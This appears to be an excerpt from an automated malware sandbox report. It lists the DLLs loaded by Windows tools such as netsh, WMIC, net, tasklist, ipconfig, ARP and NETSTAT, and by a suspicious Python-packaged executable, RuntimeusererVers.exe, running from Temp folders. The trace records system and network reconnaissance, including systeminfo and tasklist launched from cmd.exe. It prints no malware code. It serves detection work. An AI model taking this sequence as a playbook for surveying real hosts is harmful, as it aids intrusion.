                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
                      Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
                      Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
                      Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: python311.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libffi-8.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: python3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libcrypto-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: libssl-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
